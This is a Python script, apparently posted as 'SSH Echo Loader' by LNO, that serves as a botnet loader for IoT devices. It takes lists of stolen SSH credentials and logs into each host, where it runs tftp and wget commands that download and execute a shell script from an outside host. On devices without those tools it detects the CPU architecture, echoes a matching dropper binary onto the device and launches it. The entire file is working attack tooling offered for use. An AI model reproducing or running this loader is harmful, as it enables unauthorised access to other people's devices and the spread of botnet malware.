[ PYTHON ] SSH Echo Loader | By LNO

1. #SSH Echo Loader
2. from threading import Thread
3. #from multiprocessing import Process
4. import sys, os, re, time, socket
5. from Queue import *
6. from sys import stdout
7. import glob
8. import paramiko
9.  
10. if len(sys.argv) < 3:
11.     sys.exit("Usage: python "+sys.argv[0]+" <list> <threads>")
12.  
13. paramiko.util.log_to_file("/dev/null")
14. c = open(sys.argv[1], "r").readlines()
15. threads = int(sys.argv[2])
16. cmd_TFTP = "cd /tmp; echo ''>DIRTEST || cd /var; echo ''>DIRTEST; tftp -r tbin.sh -g 1.3.3.7; sh tbin.sh"
17. cmd_WGET = "cd /tmp; echo ''>DIRTEST || cd /var; echo ''>DIRTEST; wget http://1.3.3.7:80/bin.sh; sh bin.sh"
18. queue = Queue()
19. qc = 0
20.  
21. dropper_dir = "bins/*"
22. droppers = glob.glob(dropper_dir)
23. for dropper in droppers:
24.     if "x86" in dropper:
25.         print "x86 Dropper Added"
26.         X86 = dropper
27.     elif "arm" in dropper and "7" not in dropper:
28.         print "ARM Dropper Added"
29.         ARM = dropper
30.     elif "arm7" in dropper:
31.         print "ARM7 Dropper Added"
32.         ARM7 = dropper
33.     elif "ppc" in dropper:
34.         print "PPC Dropper Added"
35.         PPC = dropper
36.     elif "sh4" in dropper:
37.         print "SH4 Dropper Added"
38.         SH4 = dropper
39.     elif "mips" in dropper:
40.         print "Mips Dropper Added"
41.         MIPS = dropper
42.     elif "mpsl" in dropper:
43.         print "Mipsel Dropper Added"
44.         MPSL = dropper
45. print
46. for cs in c:
47.     qc += 1
48.     stdout.write("\r[%d] Added to queue" % qc)
49.     stdout.flush()
50.     queue.put(cs)
51. print "\n"
52.  
53. def sshload(username,password,ip):
54.     try:
55.         ip = ip.rstrip("\n")
56.         tftp = 0
57.         wget = 0
58.         echo = 0
59.         port = 22
60.         ssh = paramiko.SSHClient()
61.         ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
62.         ssh.connect(ip, port = port, username=username, password=password, timeout=3)
63. #       print "Connected! %s"%(ip)
64.         ssh.exec_command("sh")
65.         time.sleep(0.001)
66.         ssh.exec_command("enable")
67.         time.sleep(0.001)
68.         ssh.exec_command("system")
69.         time.sleep(0.001)
70.         ssh.exec_command("shell")
71.         time.sleep(0.001)
72.         ssh.exec_command("cat | sh")
73.         time.sleep(0.001)
74.         stdin, stdout, stderr = ssh.exec_command("/bin/busybox")
75.         o = stdout.read()
76.         #checking
77.         if "tftp" in o and "BusyBox" in o:
78.             tftp = 1
79.         elif "wget" in o and "BusyBox" in o:
80.             wget = 1
81.         elif "wget" not in o and "tftp" not in o and "BusyBox" in o:
82.             echo = 1
83. #       if "BusyBox" in o:
84. #           echo = 1
85. #       else:
86. #           pass
87.         #executing
88.         if tftp:
89.             print "(TFTP) COMMAND SENT: %s"%(ip)
90.             ssh.exec_command(cmd_TFTP)
91.             ssh.close()
92.         elif wget:
93.             print "(WGET) COMMAND SENT: %s"%(ip)
94.             ssh.exec_command(cmd_WGET)
95.             ssh.close()
96.         elif echo:
97.             time.sleep(0.001)
98.             stdin, stdout, stderr = ssh.exec_command('cat /proc/cpuinfo | grep -E "model|type|imple"; uname -m')
99.             ARCH_TYPE = stdout.read()
100.             print "- CHECKING ARCH TO DEPLOY HEX %s"%(ip)
101.             if "x86_64" in ARCH_TYPE:
102.                 print "(ECHO) ARCH DETECTED: x86_64 %s:%s:%s"%(username,password,ip)
103.                 a = open(X86, "r").readlines()
104.                 ssh.exec_command("cd /tmp; echo ''>DIRTEST || cd /var; echo ''>DIRTEST")
105.                 ssh.exec_command("rm -rf lno")
106.                 for L in a:
107.                     ssh.exec_command(L)
108.                     time.sleep(0.005)
109.                 ssh.exec_command("\n")
110.                 print "executed %s:%s:%s"%(username,password,ip)
111.             elif "ARMv4" in ARCH_TYPE or "armv4l" in ARCH_TYPE or "v4l" in ARCH_TYPE:
112.                 print "(ECHO) ARCH DETECTED: ARM-4 %s:%s:%s"%(username,password,ip)
113.                 b = open(ARM, "r").readlines()
114.                 ssh.exec_command("cd /tmp; echo ''>DIRTEST || cd /var; echo ''>DIRTEST")
115.                 ssh.exec_command("rm -rf lno")
116.                 for L in b:
117.                     ssh.exec_command(L)
118.                     time.sleep(0.005)
119.                 ssh.exec_command("\n")
120.                 print "executed %s:%s:%s"%(username,password,ip)
121.             elif "ARMv5" in ARCH_TYPE or "armv5l" in ARCH_TYPE or "v5l" in ARCH_TYPE:
122.                 print "(ECHO) ARCH DETECTED: ARM-5 %s:%s:%s"%(username,password,ip)
123.                 c = open(ARM, "r").readlines()
124.                 ssh.exec_command("cd /tmp; echo ''>DIRTEST || cd /var; echo ''>DIRTEST")
125.                 ssh.exec_command("rm -rf lno")
126.                 for L in c:
127.                     ssh.exec_command(L)
128.                     time.sleep(0.005)
129.                 ssh.exec_command("\n")
130.                 print "executed %s:%s:%s"%(username,password,ip)
131.             elif "ARMv6" in ARCH_TYPE or "armv6l" in ARCH_TYPE or "v6l" in ARCH_TYPE:
132.                 print "(ECHO) ARCH DETECTED: ARM-6 %s:%s:%s"%(username,password,ip)
133.                 d = open(ARM, "r").readlines()
134.                 ssh.exec_command("cd /tmp; echo ''>DIRTEST || cd /var; echo ''>DIRTEST")
135.                 ssh.exec_command("rm -rf lno")
136.                 for L in d:
137.                     ssh.exec_command(L)
138.                     time.sleep(0.005)
139.                 ssh.exec_command("\n")
140.                 print "executed %s:%s:%s"%(username,password,ip)
141.             elif "ARMv7" in ARCH_TYPE or "armv7l" in ARCH_TYPE or "v7l" in ARCH_TYPE:
142.                 print "(ECHO) ARCH DETECTED: ARM-7 %s:%s:%s"%(username,password,ip)
143.                 e = open(ARM7, "r").readlines()
144.                 ssh.exec_command("cd /tmp; echo ''>DIRTEST || cd /var; echo ''>DIRTEST")
145.                 ssh.exec_command("rm -rf lno")
146.                 for L in e:
147.                     ssh.exec_command(L)
148.                     time.sleep(0.005)
149.                 ssh.exec_command("\n")
150.                 print "executed %s:%s:%s"%(username,password,ip)
151.             elif "MIPS" in ARCH_TYPE or "mips16" in ARCH_TYPE:
152.                 print "(ECHO) ARCH DETECTED: MIPS %s:%s:%s"%(username,password,ip)
153.                 f = open(MIPS, "r").readlines()
154.                 ssh.exec_command("cd /tmp; echo ''>DIRTEST || cd /var; echo ''>DIRTEST")
155.                 ssh.exec_command("rm -rf lno")
156.                 for L in f:
157.                     ssh.exec_command(L)
158.                     time.sleep(0.005)
159.                 ssh.exec_command("\n")
160.                 print "executed %s:%s:%s"%(username,password,ip)
161.             elif "mips64" in ARCH_TYPE or "mipsel" in ARCH_TYPE:
162.                 print "(ECHO) ARCH DETECTED: MIPSEL %s:%s:%s"%(username,password,ip)
163.                 g = open(MPSL, "r").readlines()
164.                 ssh.exec_command("cd /tmp; echo ''>DIRTEST || cd /var; echo ''>DIRTEST")
165.                 ssh.exec_command("rm -rf lno")
166.                 for L in g:
167.                     ssh.exec_command(L)
168.                     time.sleep(0.005)
169.                 ssh.exec_command("\n")
170.                 print "executed %s:%s:%s"%(username,password,ip)
171.             elif "SUPERH" in ARCH_TYPE or "sh4" in ARCH_TYPE:
172.                 print "(ECHO) ARCH DETECTED: SH4 %s:%s:%s"%(username,password,ip)
173.                 h = open(SH4, "r").readlines()
174.                 ssh.exec_command("cd /tmp; echo ''>DIRTEST || cd /var; echo ''>DIRTEST")
175.                 ssh.exec_command("rm -rf lno")
176.                 for L in h:
177.                     ssh.exec_command(L)
178.                     time.sleep(0.005)
179.                 ssh.exec_command("\n")
180.                 print "executed %s:%s:%s"%(username,password,ip)
181.             elif "POWERPC" in ARCH_TYPE or "ppc" in ARCH_TYPE:
182.                 print "(ECHO) ARCH DETECTED: PPC %s:%s:%s"%(username,password,ip)
183.                 i = open(PPC, "r").readlines()
184.                 ssh.exec_command("cd /tmp; echo ''>DIRTEST || cd /var; echo ''>DIRTEST")
185.                 ssh.exec_command("rm -rf lno")
186.                 for L in i:
187.                     ssh.exec_command(L)
188.                     time.sleep(0.005)
189.                 ssh.exec_command("\n")
190.                 print "executed %s:%s:%s"%(username,password,ip)
191.             ssh.exec_command("chmod 777 lno; lno; ./dvrHelper ssh.LiGhT")
192.             time.sleep(10)
193.             ssh.close()
194.     except:
195.         ssh.close()
196.         pass
197.  
198. def main():
199.     while True:
200.         try:
201.             for l in xrange(threads):
202.                 try:
203.                     IP = queue.get()
204.                     ip = IP.split(":")                 
205.                     thread = Thread(target=sshload, args=(ip[0],ip[1],ip[2],))
206.                     thread.start()
207.                     username=ip[0]
208.                     password=ip[1]
209.                     ip=ip[2]
210.                     queue.task_done()
211.                 except:
212.                     pass
213.             time.sleep(2)
214.         except:
215.             pass
216. main()